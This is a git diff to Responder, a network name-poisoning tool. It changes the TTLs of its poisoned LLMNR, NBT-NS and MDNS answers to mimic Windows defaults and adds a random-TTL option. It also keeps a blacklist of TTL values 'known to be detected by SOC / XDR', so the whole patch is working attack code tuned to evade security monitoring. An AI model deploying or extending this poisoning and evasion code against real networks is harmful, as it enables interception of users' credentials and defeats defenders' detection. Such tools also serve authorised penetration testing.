diff --git a/Responder.py b/Responder.py index 49fab8e..bbd3c7a 100755 --- a/Responder.py +++ b/Responder.py @@ -45,7 +45,7 @@ parser.add_option('-Q','--quiet', action="store_true", help="Tell Resp parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False) parser.add_option('--disable-ess', action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False) parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose") -parser.add_option('-t','--ttl', action="store", help="Configure the TTL in the victim cache. Value in hex (30 seconds = 1e)", dest="TTL", metavar="1e", default=None) +parser.add_option('-t','--ttl', action="store", help="Change the default Windows TTL for poisoned answers. Value in hex (30 seconds = 1e). use '-t random' for random TTL", dest="TTL", metavar="1e", default=None) options, args = parser.parse_args() if not os.geteuid() == 0: diff --git a/packets.py b/packets.py index 3ec9dec..bb3134e 100644 --- a/packets.py +++ b/packets.py @@ -52,7 +52,7 @@ class NBT_Ans(Packet): ("NbtName", ""), ("Type", "\x00\x20"), ("Classy", "\x00\x01"), - ("TTL", "\x00\x00\x00\xa5"), + ("TTL", "\x00\x04\x93\xe0"), #TTL: 3 days, 11 hours, 20 minutes (Default windows behavior) ("Len", "\x00\x06"), ("Flags1", "\x00\x00"), ("IP", "\x00\x00\x00\x00"), @@ -263,7 +263,7 @@ class LLMNR_Ans(Packet): ("AnswerNameNull", "\x00"), ("Type1", "\x00\x01"), ("Class1", "\x00\x01"), - ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec. + ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior) ("IPLen", "\x00\x04"), ("IP", "\x00\x00\x00\x00"), ]) @@ -292,7 +292,7 @@ class LLMNR6_Ans(Packet): ("AnswerNameNull", "\x00"), ("Type1", "\x00\x1c"), ("Class1", "\x00\x01"), - ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec. + ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior). ("IPLen", "\x00\x04"), ("IP", "\x00\x00\x00\x00"), ]) @@ -316,7 +316,7 @@ class MDNS_Ans(Packet): ("AnswerNameNull", "\x00"), ("Type", "\x00\x01"), ("Class", "\x00\x01"), - ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn. + ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior) ("IPLen", "\x00\x04"), ("IP", "\x00\x00\x00\x00"), ]) @@ -338,7 +338,7 @@ class MDNS6_Ans(Packet): ("AnswerNameNull", "\x00"), ("Type", "\x00\x1c"), ("Class", "\x00\x01"), - ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn. + ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior) ("IPLen", "\x00\x04"), ("IP", "\x00\x00\x00\x00"), ]) diff --git a/poisoners/LLMNR.py b/poisoners/LLMNR.py index e130273..36fe7c3 100755 --- a/poisoners/LLMNR.py +++ b/poisoners/LLMNR.py @@ -76,7 +76,11 @@ class LLMNR(BaseRequestHandler): # LLMNR Server class }) elif LLMNRType == True: # Poisoning Mode - Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL) + #Default: + if settings.Config.TTL == None: + Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name) + else: + Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL) Buffer1.calculate() soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address) if not settings.Config.Quiet_Mode: @@ -90,7 +94,11 @@ class LLMNR(BaseRequestHandler): # LLMNR Server class }) elif LLMNRType == 'IPv6' and Have_IPv6: - Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL) + #Default: + if settings.Config.TTL == None: + Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name) + else: + Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL) Buffer1.calculate() soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address) if not settings.Config.Quiet_Mode: diff --git a/poisoners/MDNS.py b/poisoners/MDNS.py index b1049bc..3ef0c7c 100755 --- a/poisoners/MDNS.py +++ b/poisoners/MDNS.py @@ -73,7 +73,11 @@ class MDNS(BaseRequestHandler): }) elif MDNSType == True: # Poisoning Mode Poisoned_Name = Poisoned_MDNS_Name(data) - Buffer = MDNS_Ans(AnswerName = Poisoned_Name, TTL=settings.Config.TTL) + #Use default: + if settings.Config.TTL == None: + Buffer = MDNS_Ans(AnswerName = Poisoned_Name) + else: + Buffer = MDNS_Ans(AnswerName = Poisoned_Name, TTL=settings.Config.TTL) Buffer.calculate() soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address) if not settings.Config.Quiet_Mode: @@ -85,9 +89,13 @@ class MDNS(BaseRequestHandler): 'AnalyzeMode': '0', }) - elif MDNSType == 'IPv6'and Have_IPv6: # Poisoning Mode + elif MDNSType == 'IPv6' and Have_IPv6: # Poisoning Mode Poisoned_Name = Poisoned_MDNS_Name(data) - Buffer = MDNS6_Ans(AnswerName = Poisoned_Name) + #Use default: + if settings.Config.TTL == None: + Buffer = MDNS6_Ans(AnswerName = Poisoned_Name) + else: + Buffer = MDNS6_Ans(AnswerName = Poisoned_Name, TTL= settings.Config.TTL) Buffer.calculate() soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address) if not settings.Config.Quiet_Mode: diff --git a/poisoners/NBTNS.py b/poisoners/NBTNS.py index 446dc06..ff3a1cd 100755 --- a/poisoners/NBTNS.py +++ b/poisoners/NBTNS.py @@ -44,7 +44,10 @@ class NBTNS(BaseRequestHandler): 'AnalyzeMode': '1', }) else: # Poisoning Mode - Buffer1 = NBT_Ans(TTL=settings.Config.TTL) + if settings.Config.TTL == None: + Buffer1 = NBT_Ans() + else: + Buffer1 = NBT_Ans(TTL=settings.Config.TTL) Buffer1.calculate(data) socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address) if not settings.Config.Quiet_Mode: diff --git a/settings.py b/settings.py index ea895f3..bdca9c2 100644 --- a/settings.py +++ b/settings.py @@ -175,8 +175,12 @@ class Settings: # TTL blacklist. Known to be detected by SOC / XDR TTL_blacklist = [b"\x00\x00\x00\x1e", b"\x00\x00\x00\x78", b"\x00\x00\x00\xa5"] - # Random TTL + # Lets add a default mode, which uses Windows default TTL for each protocols (set respectively in packets.py) if options.TTL is None: + self.TTL = None + + # Random TTL + elif options.TTL.upper() == "RANDOM": TTL = bytes.fromhex("000000"+format(random.randint(10,90),'x')) if TTL in TTL_blacklist: TTL = int.from_bytes(TTL, "big")+1 diff --git a/utils.py b/utils.py index b216ca1..8eb15ca 100644 --- a/utils.py +++ b/utils.py @@ -559,7 +559,10 @@ def StartupMessage(): print(' %-27s' % "Don't Respond To" + color(str(settings.Config.DontRespondTo), 5, 1)) if len(settings.Config.DontRespondToName): print(' %-27s' % "Don't Respond To Names" + color(str(settings.Config.DontRespondToName), 5, 1)) - print(' %-27s' % "TTL for poisoned response" + color(str(settings.Config.TTL.encode().hex()) + " ("+ str(int.from_bytes(str.encode(settings.Config.TTL),"big")) +" seconds)", 5, 1)) + if settings.Config.TTL == None: + print(' %-27s' % "TTL for poisoned response "+ color('[default]', 5, 1)) + else: + print(' %-27s' % "TTL for poisoned response" + color(str(settings.Config.TTL.encode().hex()) + " ("+ str(int.from_bytes(str.encode(settings.Config.TTL),"big")) +" seconds)", 5, 1)) print('') print(color("[+] ", 2, 1) + "Current Session Variables:")